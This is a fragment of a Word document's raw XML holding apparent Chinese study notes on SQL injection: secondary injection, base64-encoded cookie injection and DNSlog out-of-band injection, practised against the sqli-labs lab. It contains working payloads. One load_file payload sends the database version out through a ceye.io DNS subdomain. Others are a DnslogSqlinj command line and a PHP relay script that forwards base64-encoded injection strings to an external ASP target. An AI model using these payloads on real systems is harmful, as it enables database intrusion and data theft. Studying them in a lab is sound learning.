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17 WEB漏洞-二次,加解密,DNS等注入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#加解密，二次，DNSlog注入</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>注入原理，演示案例，实际应用（中转注入）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DNSlog:解决了盲注不能回显数据，效率低的问题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http://127.0.0.1:8080/sqlilabs/less-2/?id=-1 and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if((select load_file(concat('\\\\',(select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version()),'.1t7i2f.ceye.io\\abc'))),1,0)--+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D:\Python27\python.exe dnslogSql.py -u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"http://127.0.0.1:8080/sqlilabs/Less-9/?id=1'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and ({})--+"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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5272405" cy="2617470"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1905"/>
            <wp:docPr id="2" name="图片 2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演示案例：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✧ sqlilabs-less21-cookie&amp;加解密注入（实际案例）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✧ sqlilabs-less24-post登陆框&amp;二次注入（实际案例）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✧ sqlilabs-less9-load_file&amp;dnslog带外注入（实际案例）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✧ py-DnslogSqlinj-dnslog注入演示脚本演示（实际案例）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涉及资源：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http://ceye.io/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https://github.com/ADOOO/DnslogSqlinj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&lt;?php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$url='http://xxxx/job_bystjb/yjs_byszjs.asp?id=';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$payload=base64_encode($_GET['x']);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echo $payload;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$urls=$url.$payload;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file_get_contents($urls);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echo $urls;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?&gt;</w:t>
      </w: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E7229"/>
    <w:rsid w:val="4D4E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2021-03-01T02:54:00Z</dcterms:created>
  <dc:creator>玄泽</dc:creator>
  <cp:lastModifiedBy>玄泽</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-01T02:57:12Z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